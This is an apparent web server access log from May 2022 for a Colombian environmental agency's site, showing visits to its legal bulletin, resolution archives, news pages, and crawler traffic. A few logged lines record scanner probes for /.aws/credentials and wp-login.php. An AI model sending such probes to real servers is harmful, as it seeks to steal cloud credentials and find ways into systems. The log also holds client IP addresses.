172.22.2.4 - - [15/May/2022:10:43:35 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [15/May/2022:10:43:35 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [15/May/2022:10:43:35 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [15/May/2022:10:43:35 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [15/May/2022:10:43:35 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [15/May/2022:10:43:35 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [15/May/2022:10:43:35 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [15/May/2022:10:43:35 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [15/May/2022:10:43:36 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [15/May/2022:10:43:36 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [15/May/2022:10:43:36 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [15/May/2022:10:43:36 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [15/May/2022:10:43:36 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [15/May/2022:10:43:36 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [15/May/2022:10:43:36 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [15/May/2022:10:43:39 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [15/May/2022:10:43:40 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [15/May/2022:10:43:43 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 103626
172.22.2.4 - - [15/May/2022:10:43:43 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [15/May/2022:10:43:43 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
186.154.24.21 - - [15/May/2022:10:43:47 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.154.24.21 - - [15/May/2022:10:43:49 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
186.154.24.21 - - [15/May/2022:10:43:49 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
186.154.24.21 - - [15/May/2022:10:43:49 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
186.154.24.21 - - [15/May/2022:10:43:49 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.154.24.21 - - [15/May/2022:10:44:00 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
186.154.24.21 - - [15/May/2022:10:44:00 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
186.154.24.21 - - [15/May/2022:10:44:00 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 629247
186.154.24.21 - - [15/May/2022:10:44:15 -0500] "GET /BLA/resoluciones/AUTOS%202011/0552.pdf HTTP/1.1" 200 285887
172.22.2.4 - - [15/May/2022:10:42:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/May/2022:10:43:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44230
172.22.2.4 - - [15/May/2022:10:43:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
186.154.24.21 - - [15/May/2022:10:44:26 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.154.24.21 - - [15/May/2022:10:44:29 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 629247
207.46.13.37 - - [15/May/2022:10:44:35 -0500] "GET /bla/resoluciones/index.php?dir=notificaciones/autos+2020 HTTP/1.1" 200 118625
172.22.2.4 - - [15/May/2022:10:43:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
207.46.13.159 - - [15/May/2022:10:45:13 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02340.pdf HTTP/1.1" 200 387485
216.245.221.92 - - [15/May/2022:10:47:37 -0500] "HEAD / HTTP/1.1" 200 -
104.152.52.75 - - [15/May/2022:10:48:00 -0500] "GET / HTTP/1.0" 200 319
172.22.2.4 - - [15/May/2022:10:48:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:10:49:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
207.46.13.134 - - [15/May/2022:10:51:36 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02390.doc HTTP/1.1" 200 387618
207.46.13.109 - - [15/May/2022:10:52:21 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02067.doc HTTP/1.1" 200 388254
54.37.22.88 - - [15/May/2022:10:52:18 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-la-Conejera.jpg HTTP/1.1" 200 202147
216.245.221.92 - - [15/May/2022:10:52:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:10:55:22 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 304 -
172.22.2.4 - - [15/May/2022:10:55:23 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 163426
186.86.34.0 - - [15/May/2022:10:55:37 -0500] "GET /si-te-gusta-la-pintura-el-dibujo-o-la-fotografia-el-concurso-a-vuelo-de-pajaro-es-para-ti.html HTTP/1.1" 200 861
172.22.2.4 - - [15/May/2022:10:54:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:10:56:19 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 200 165608
172.22.2.4 - - [15/May/2022:10:56:20 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1498
172.22.2.4 - - [15/May/2022:10:55:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [15/May/2022:10:57:37 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.229 - - [15/May/2022:10:59:41 -0500] "-" 408 -
172.22.2.4 - - [15/May/2022:11:00:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/May/2022:11:02:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:00:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
207.46.13.134 - - [15/May/2022:11:04:18 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/00668.doc HTTP/1.1" 200 195121
109.237.103.118 - - [15/May/2022:11:04:32 -0500] "GET /.aws/credentials HTTP/1.1" 404 1018
109.237.103.118 - - [15/May/2022:11:04:32 -0500] "\x16\x03\x01\x01D\x01" 400 226
217.182.171.12 - - [15/May/2022:11:05:17 -0500] "HEAD /BLA/resoluciones/AUTOS%202014/2891.pdf HTTP/1.1" 200 -
181.53.12.98 - - [15/May/2022:11:05:49 -0500] "GET /bogota-tendra-la-primera-planta-de-termovalorizacion-de-colombia-la-cual-convertira-los-residuos-en-energia-para-la-ciudad.html HTTP/1.1" 200 883
216.245.221.92 - - [15/May/2022:11:07:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:05:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:06:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
172.22.2.4 - - [15/May/2022:11:09:12 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
66.249.65.13 - - [15/May/2022:11:09:21 -0500] "-" 408 -
207.46.13.159 - - [15/May/2022:11:09:56 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02726.pdf HTTP/1.1" 200 362786
172.22.2.4 - - [15/May/2022:11:09:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63342
207.46.13.37 - - [15/May/2022:11:10:57 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02239.doc HTTP/1.1" 200 377300
102.165.48.50 - - [15/May/2022:11:12:06 -0500] "GET /wp-login.php HTTP/1.1" 404 1035
172.22.2.4 - - [15/May/2022:11:12:06 -0500] "GET /BLA/boletinlegal/wp-login.php HTTP/1.1" 404 1038
31.13.127.18 - - [15/May/2022:11:12:18 -0500] "GET /images/culebra-sabanera-bogota-26-marzo.jpg HTTP/1.1" 200 22555
216.245.221.92 - - [15/May/2022:11:12:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:11:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.134 - - [15/May/2022:11:13:39 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02741.pdf HTTP/1.1" 200 608796
172.22.2.4 - - [15/May/2022:11:12:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
172.22.2.4 - - [15/May/2022:11:15:48 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8292
172.22.2.4 - - [15/May/2022:11:15:49 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [15/May/2022:11:15:49 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [15/May/2022:11:15:50 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [15/May/2022:11:15:51 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [15/May/2022:11:15:51 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [15/May/2022:11:15:51 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [15/May/2022:11:15:52 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
172.22.2.4 - - [15/May/2022:11:16:03 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8292
172.22.2.4 - - [15/May/2022:11:16:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [15/May/2022:11:16:07 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [15/May/2022:11:16:07 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [15/May/2022:11:16:07 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [15/May/2022:11:16:07 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [15/May/2022:11:16:07 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
216.245.221.92 - - [15/May/2022:11:17:37 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.11 - - [15/May/2022:11:17:55 -0500] "GET /bla/resoluciones/resoluciones%201998/resolucion%20722%20de%201998.pdf HTTP/1.1" 200 69991
198.235.24.25 - - [15/May/2022:11:18:58 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [15/May/2022:11:17:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:18:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51717
172.22.2.4 - - [15/May/2022:11:19:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [15/May/2022:11:19:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [15/May/2022:11:21:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [15/May/2022:11:22:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/May/2022:11:22:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46751
201.245.192.253 - - [15/May/2022:11:23:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44078
172.22.2.4 - - [15/May/2022:11:23:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
128.14.136.18 - - [15/May/2022:11:25:10 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
172.22.2.4 - - [15/May/2022:11:24:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60486
172.22.2.4 - - [15/May/2022:11:26:19 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [15/May/2022:11:26:19 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [15/May/2022:11:26:33 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2230&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1387
186.31.208.123 - - [15/May/2022:11:26:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2230.pdf HTTP/1.1" 200 5665025
172.22.2.4 - - [15/May/2022:11:26:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [15/May/2022:11:27:37 -0500] "HEAD / HTTP/1.1" 200 -
66.220.149.4 - - [15/May/2022:11:28:08 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
66.220.149.13 - - [15/May/2022:11:28:08 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
66.220.149.13 - - [15/May/2022:11:28:08 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
66.220.149.6 - - [15/May/2022:11:28:08 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
66.220.149.15 - - [15/May/2022:11:28:08 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
66.220.149.9 - - [15/May/2022:11:28:08 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
66.220.149.13 - - [15/May/2022:11:28:08 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
66.220.149.15 - - [15/May/2022:11:28:08 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
66.220.149.6 - - [15/May/2022:11:28:08 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
18.210.147.12 - - [15/May/2022:11:28:08 -0500] "HEAD /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 200 -
69.63.184.1 - - [15/May/2022:11:28:08 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
66.220.149.4 - - [15/May/2022:11:28:09 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
173.252.107.7 - - [15/May/2022:11:28:11 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
69.171.251.15 - - [15/May/2022:11:28:11 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
173.252.111.18 - - [15/May/2022:11:29:19 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
173.252.127.4 - - [15/May/2022:11:29:49 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
173.252.87.22 - - [15/May/2022:11:29:58 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
207.46.13.159 - - [15/May/2022:11:29:58 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/03233.doc HTTP/1.1" 200 392054
69.63.184.4 - - [15/May/2022:11:30:00 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
54.39.16.124 - - [15/May/2022:11:30:19 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 200 935
173.252.83.116 - - [15/May/2022:11:30:33 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
69.63.184.4 - - [15/May/2022:11:30:33 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 206 935
172.22.2.4 - - [15/May/2022:11:29:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:30:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58006
173.252.95.11 - - [15/May/2022:11:32:00 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
216.245.221.92 - - [15/May/2022:11:32:37 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.134 - - [15/May/2022:11:32:41 -0500] "GET /BLA/boletinlegal/Circulares/2018/CIRCULAR%20COJUNTA%20042%20DE%202018.pdf HTTP/1.1" 200 515008
207.46.13.109 - - [15/May/2022:11:32:44 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02415.doc HTTP/1.1" 200 372629
181.143.71.98 - - [15/May/2022:11:33:26 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html?fbclid=IwAR0ndMwQClNJ6nfMOF-nXp3vH7ucwkSSq_c5v6cChRGTEHG9CtRKI12D9mk HTTP/1.1" 200 935
201.245.192.253 - - [15/May/2022:11:32:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46751
201.245.192.253 - - [15/May/2022:11:33:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44078
173.252.107.10 - - [15/May/2022:11:34:31 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
172.22.2.4 - - [15/May/2022:11:35:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/May/2022:11:37:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:35:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
173.252.79.20 - - [15/May/2022:11:37:45 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
17.121.113.120 - - [15/May/2022:11:37:57 -0500] "-" 408 -
207.46.13.109 - - [15/May/2022:11:38:25 -0500] "GET /bla/resoluciones/resoluciones%201998/resolucion%20788%20de%201998.pdf HTTP/1.1" 200 91861
45.238.182.71 - - [15/May/2022:11:38:42 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 200 935
207.46.13.109 - - [15/May/2022:11:38:45 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/01470.doc HTTP/1.1" 200 361178
66.220.149.21 - - [15/May/2022:11:39:10 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
216.245.221.92 - - [15/May/2022:11:42:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/May/2022:11:40:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.159 - - [15/May/2022:11:43:08 -0500] "GET /bla/resoluciones/resoluciones%201998/1233.pdf HTTP/1.1" 200 374136
172.22.2.4 - - [15/May/2022:11:41:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
201.245.192.253 - - [15/May/2022:11:42:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46751
201.245.192.253 - - [15/May/2022:11:43:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44078
207.46.13.37 - - [15/May/2022:11:46:10 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/02807.pdf HTTP/1.1" 200 385043
186.102.40.255 - - [15/May/2022:11:47:04 -0500] "GET /recuperacion-del-parque-nacional-avanza-de-forma-satisfactoria.html HTTP/1.1" 200 1053
186.102.98.94 - - [15/May/2022:11:47:04 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+vSfseJyhb4GYsqtU8xommZejKsgzhF6+BT3F92EtDfshw7NwFNrvidNrq28Snz2I1zsrtGFvAyKUFhCNhLJark3U5UzxwzotUhSoNe3JOcH8yUJISrNuCiPn1iN0iz9P8ydcvKmRVuHjMmJbuxe4SlSB3bSgDRG6iD8gTwAfB+986FA674b4KUiBNSGHTHi545Sd5ayIwSvccLn2n7ZVjLWdzqCUnyzLoOLGafyZz750bB2r+qCcnW/ASbJl2tn007GrLKfp5Bg==&u=U2FsdGVkX1+fYc71scxNf5Y+sSrnsIkQEQj+25NE+8PexpUCC5sK895niUF4qmRc&y=U2FsdGVkX19otMwRn9+JZ53V7mvhyqGtu1HB2MAoDmgPtvCos00K0VUUt4Qosior HTTP/1.1" 200 25
186.102.98.94 - - [15/May/2022:11:47:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/EAzWp8ywgPQZjYr7GfQUqJE7uwGo+yPIWt0sx9sjxN1mmbETUQdKjdcxxd2ujJVW1/uqYOK46KF6Wga/XUxPNoID84vP6ETe70KaX40siVUZdDmydbh3Q185qtcb7xi+JuyCGJPL5PIzH/dbQpO2WZ7aVXitMNF6ZkVjMqZUc5HgawHDKBeQK7/9dU/ctSzcNOznIsz2tSSl11eGDJ5ZcxlcYn8QCRfFLNToG8CzooOhU6A2y8YnvlwtlupihJ4mrsR96jZP+pZN0GqKp73RtrgxgYSuJKojSs0gAxumRV3doDISSsOrHkS98GfVC3C3YakLo98xE69uUYueM1gZOAJMsIvP5NZZmiNdnYxMdSxWqe6qrhAeqHNTdqBNufN5yGIWie9E2jl3lCkNknxcX9vyCAU1IAs/p3OF6F9QUs5Fzq4KjOHm7fQBNvQpwTy1NTW9mLg0nAlsuIyUiUDG46/QwtpX2lM8Q16Yl/OcvQFP8+DD8iRKxgkWonoPNCkIlAw0XFTLXN/Nf7qyNX29Rs/DJWcyi/e2+eufspgDQAVEa/zt8kX86Io+VEF0HaEr5kKyIS4qL67RGvGgCVYG+dplWTQoAngVSbhoqsHWQln+8KsuSF+QUKpk27+L8LC/4TuZ7EHi83JCJ3yZTiO3szdO2ExpFzx5sS4VWYHfGvyx6sxOmENQQUfOxsn6AOgi7btgXYu/V0rPp